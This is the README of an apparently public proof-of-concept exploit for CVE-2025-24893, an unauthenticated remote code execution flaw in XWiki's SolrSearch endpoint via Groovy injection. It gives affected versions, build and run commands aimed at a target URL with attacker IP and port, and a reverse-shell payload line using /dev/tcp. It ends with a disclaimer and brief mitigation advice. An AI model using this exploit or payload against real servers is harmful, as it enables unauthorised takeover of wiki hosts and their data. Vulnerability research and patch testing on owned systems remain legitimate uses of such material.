Proof-of-Concept exploit for CVE-2025-24893, an unauthenticated Remote Code Execution (RCE) vulnerability in XWiki. Exploits a template injection flaw in the SolrSearch endpoint via Groovy script execution.# CVE-2025-24893 — XWiki Unauthenticated RCE (PoC)
Proof-of-Concept exploit for **CVE-2025-24893**, a critical unauthenticated **Remote Code Execution** vulnerability in **XWiki**.
This exploit abuses a Groovy template injection in the `SolrSearch` endpoint to execute arbitrary commands — including reverse shells — without authentication.
## 💥 Vulnerability Details
A flaw in how XWiki handles crafted input to the `SolrSearch` RSS endpoint allows attackers to inject Groovy code into the rendering pipeline.
This enables **unauthenticated RCE** via `{{groovy}}` script blocks.
### ✅ Affected Versions
- `< 15.10.11`
- `>= 16.0.0` and `< 16.4.1`
### ❌ Fixed in
- `15.10.11`
- `16.4.1`
---
## 🔧 Usage
Download the release:
[Releases](https://github.com/investigato/cve-2025-24893-poc/releases/tag/v0.1.0)
or build from source:
```bash
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
```
### Reverse Shell Payload
There's a prebuilt reverse shell payload in this form:
`bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1`
---
## ⚠️ Legal Disclaimer
This code is for **educational and authorized security research only**.
Do **not** use this exploit against systems you do not own or have explicit permission to test.
---
## ✍️ Credits
- Exploit PoC by [Artemir7](https://github.com/Artemir7/CVE-2025-24893-EXP)
- Rust port by investigato
---
## 🛡️ Detection & Mitigation
- Update to **XWiki 15.10.11** or **16.4.1+**
- Monitor suspicious use of `/bin/get/Main/SolrSearch?media=rss`
- Disable Groovy execution for anonymous users if possible
[4.0K] /data/pocs/ccf20b542b2e509842383ed9ab6a681e8b9a474f
├── [ 45K] Cargo.lock
├── [ 424] Cargo.toml
├── [1.6K] README.md
└── [4.0K] src
└── [3.9K] main.rs
1 directory, 4 files